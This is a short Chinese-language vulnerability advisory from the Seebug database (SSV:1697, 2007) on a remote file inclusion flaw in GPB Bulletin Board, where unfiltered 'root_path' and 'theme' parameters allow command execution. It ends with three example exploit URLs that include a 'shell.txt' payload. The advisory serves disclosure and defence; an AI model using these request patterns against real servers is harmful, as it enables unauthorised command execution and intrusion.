GPB Bulletin Board远程文件包含漏洞

2007-04-28T00:00:00
ID SSV:1697
Type seebug
Reporter Root
Modified 2007-04-28T00:00:00

Description

GPB Bulletin Board是一款基于PHP的WEB应用程序。

GPB Bulletin Board不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。

问题是多个脚本对用户提交的'root_path'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。

GPB bulletin board 2001.11.14-1 目前没有解决方案提供:

<a href="http://gpb.sourceforge.net/" target="_blank">http://gpb.sourceforge.net/</a>

                                        
                                            
                                                http://www.example.com/[gpb_path]/themes/ubb/login.php?theme=shell.txt?
http://www.example.com/gpb/include/db.mysql.inc.php?root_path=&nbsp;shell.txt?
http://www.example.com/gpb/include/gpb.inc.php?root_path=shell.txt